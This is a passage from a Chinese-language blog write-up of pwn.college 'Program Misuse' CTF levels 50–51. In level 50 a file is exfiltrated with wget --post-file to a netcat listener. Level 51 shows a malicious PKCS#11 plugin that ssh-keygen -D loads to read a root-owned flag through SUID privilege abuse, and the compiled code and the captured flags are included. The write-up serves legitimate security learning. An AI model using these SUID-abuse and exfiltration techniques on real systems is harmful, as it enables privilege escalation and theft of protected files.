<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse~level50:/challenge$ nc -lp 8888 &amp; wget --post-file=/flag http://127.0.0.1:8888</span><br><span class="line">[2] 131</span><br><span class="line">--2024-05-09 11:42:32--  http://127.0.0.1:8888/</span><br><span class="line">Connecting to 127.0.0.1:8888... connected.</span><br><span class="line">POST / HTTP/1.1</span><br><span class="line">User-Agent: Wget/1.20.3 (linux-gnu)</span><br><span class="line">Accept: */*</span><br><span class="line">Accept-Encoding: identity</span><br><span class="line">Host: 127.0.0.1:8888</span><br><span class="line">Connection: Keep-Alive</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 56</span><br><span class="line"></span><br><span class="line">pwn.college&#123;o0tqlDSO04W0G3s8EPSXSIqFwU9.QXykTMsMjM0YzW&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="level51"><a href="#level51" class="headerlink" title="level51"></a>level51</h3><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse-level-51:/challenge$ ./babysuid_level51 </span><br><span class="line">Welcome to ./babysuid_level51!</span><br><span class="line"></span><br><span class="line">This challenge is part of a series of programs that</span><br><span class="line">show you how dangerous it is to allow <span class="built_in">users</span> to load their own code as plugins into the program (but figuring out how is the hard part!).</span><br><span class="line"></span><br><span class="line">I just <span class="built_in">set</span> the SUID bit on /usr/bin/ssh-keygen.</span><br><span class="line">Try to use it to <span class="built_in">read</span> the flag!</span><br><span class="line"></span><br><span class="line">IMPORTANT: make sure to run me (./babysuid_level51) every time that you restart</span><br><span class="line">this challenge container to make sure that I <span class="built_in">set</span> the SUID bit on /usr/bin/ssh-keygen!</span><br></pre></td></tr></table></figure>

<p><code>ssh-keygen</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">It is possible to sign using a CA key stored <span class="keyword">in</span> a PKCS<span class="comment">#11 token by providing the token library using -D and identifying the CA key by providing</span></span><br><span class="line">its public half as an argument to -s:</span><br><span class="line"></span><br><span class="line">      $ ssh-keygen -s ca_key.pub -D libpkcs11.so -I key_id user_key.pub</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<blockquote>
<p><code>C_GetFunctionList</code> 函数属于 PKCS#11（Cryptographic Token Interface Standard，密码令牌接口标准）库中的函数之一，用于获取PKCS#11库中支持的所有函数指针。这个函数在使用 PKCS#11 库时非常重要，因为它可以让你获取到库中定义的所有功能函数的指针，从而可以调用这些函数来执行不同的操作，比如生成密钥对、加解密数据等。</p>
</blockquote>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment">#include &lt;stdio.h&gt;</span></span><br><span class="line"><span class="comment">#include &lt;stdlib.h&gt;</span></span><br><span class="line"></span><br><span class="line">void <span class="function"><span class="title">C_GetFunctionList</span></span>()</span><br><span class="line">&#123;</span><br><span class="line">        sendfile(1, open(<span class="string">&quot;/flag&quot;</span>, 0), 0, 4096);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">hacker@program-misuse~level51:/challenge$ gcc ~/mydir/51.c -shared -o ~/mydir/51.so</span><br><span class="line">/home/hacker/mydir/51.c: In <span class="keyword">function</span> ‘C_GetFunctionList’:</span><br><span class="line">/home/hacker/mydir/51.c:6:2: warning: implicit declaration of <span class="keyword">function</span> ‘sendfile’ [-Wimplicit-function-declaration]</span><br><span class="line">    6 |  sendfile(1, open(<span class="string">&quot;/flag&quot;</span>, 0), 0, 4096);</span><br><span class="line">      |  ^~~~~~~~</span><br><span class="line">/home/hacker/mydir/51.c:6:14: warning: implicit declaration of <span class="keyword">function</span> ‘open’; did you mean ‘popen’? [-Wimplicit-function-declaration]</span><br><span class="line">    6 |  sendfile(1, open(<span class="string">&quot;/flag&quot;</span>, 0), 0, 4096);</span><br><span class="line">      |              ^~~~</span><br><span class="line">      |              popen</span><br><span class="line">hacker@program-misuse~level51:/challenge$ ssh-keygen -D ~/mydir/51.so</span><br><span class="line">pwn.college&#123;8Oyhe2JqGULoXSjwuBnQv2lGOaV.QXzkTMsMjM0YzW&#125;</span><br><span class="line">C_GetFunctionList <span class="keyword">for</span> provider /home/hacker/mydir/51.so failed: 56</span><br><span class="line">cannot <span class="built_in">read</span> public key from pkcs11</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">if</span> (lib_contains_symbol(provider_id, <span class="string">&quot;C_GetFunctionList&quot;</span>) != <span class="number">0</span>) &#123;</span><br><span class="line">	error(<span class="string">&quot;provider %s is not a PKCS11 library&quot;</span>, provider_id);</span><br><span class="line">	<span class="keyword">goto</span> fail;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">/* open shared pkcs11-library */</span></span><br><span class="line"><span class="keyword">if</span> ((handle = dlopen(provider_id, RTLD_NOW)) == <span class="literal">NULL</span>) &#123;</span><br><span class="line">	error(<span class="string">&quot;dlopen %s failed: %s&quot;</span>, provider_id, dlerror());</span><br><span class="line">	<span class="keyword">goto</span> fail;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> ((getfunctionlist = dlsym(handle, <span class="string">&quot;C_GetFunctionList&quot;</span>)) == <span class="literal">NULL</span>)</span><br><span class="line">	fatal(<span class="string">&quot;dlsym(C_GetFunctionList) failed: %s&quot;</span>, dlerror());</span><br><span class="line"></span><br><span class="line"><span class="comment">// 函数调用</span></span><br><span class="line"><span class="keyword">if</span> ((rv = (*getfunctionlist)(&amp;f)) != CKR_OK) &#123;</span><br><span class="line">	error(<span class="string">&quot;C_GetFunctionList for provider %s failed: %lu&quot;</span>,</span><br><span class="line">	    provider_id, rv);</span><br><span class="line">	<span class="keyword">goto</span> fail;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a target="_blank" rel="noopener" href="https://gtfobins.github.io/">https://gtfobins.github.io/</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/openssh/openssh-portable/blob/master/ssh-pkcs11.c#L1566">https://github.com/openssh/openssh-portable/blob/master/ssh-pkcs11.c#L1566</a></p>
<ul>
<li><input disabled type="checkbox"> <a target="_blank" rel="noopener" href="https://wiki.wireshark.org/Development/PrivilegeSeparation">PrivilegeSeparation</a></li>
</ul>

    </div>

    
    
    

    <footer class="post-footer">
          

<div class="post-copyright">
<ul>
  <li class="post-copyright-author">
      <strong>本文作者： </strong>w3b5h3ll
  </li>
  <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="https://w3b5h3ll.github.io/wiki/2024/05/09/PwnCollege-ProgramMisuse/" title="">https://w3b5h3ll.github.io/wiki/2024/05/09/PwnCollege-ProgramMisuse/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/wiki/2024/05/09/PwnCollege-ProgramInteraction/" rel="prev" title="">
                  <i class="fa fa-chevron-left"></i> 
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/wiki/2024/05/09/PwnCollege-RaceConditions/" rel="next" title="">
                   <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
  
  
  



      
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      const activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      const commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

    </div>
  </main>

  <footer class="footer">
    <div class="footer-inner">
      

      

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">w3b5h3ll</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <script src="//cdn.jsdelivr.net/npm/animejs@3.2.0/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script>
<script src="/wiki/js/utils.js"></script><script src="/wiki/js/motion.js"></script><script src="/wiki/js/schemes/muse.js"></script><script src="/wiki/js/next-boot.js"></script>

  




  <script src="/wiki/js/local-search.js"></script>










<script>
if (document.querySelectorAll('.mermaid').length) {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/mermaid@8.7.0/dist/mermaid.min.js', () => {
    mermaid.init({
      theme    : 'forest',
      logLevel : 3,
      flowchart: { curve     : 'linear' },
      gantt    : { axisFormat: '%m/%d/%Y' },
      sequence : { actorMargin: 50 }
    }, '.mermaid');
  }, window.mermaid);
}
</script>


  








  

  

  
<script>
NexT.utils.loadComments('#valine-comments', () => {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js', () => {
    new Valine(Object.assign({
      el  : '#valine-comments',
      path: "/wiki/2024/05/09/PwnCollege-ProgramMisuse/",
    }, {"enable":true,"appId":"htEoF16VKxb4kS3oG0LReLBz-MdYXbMMI","appKey":"P7rwEt21RTK0B11XxuTwjss2","serverURLs":"https://hteof16v.api.lncldglobal.com","placeholder":"Just go go","avatar":"mm","meta":["nick","mail","link"],"pageSize":10,"visitor":true,"comment_count":true,"recordIP":false}
    ));
  }, window.Valine);
});
</script>

</body>
</html>
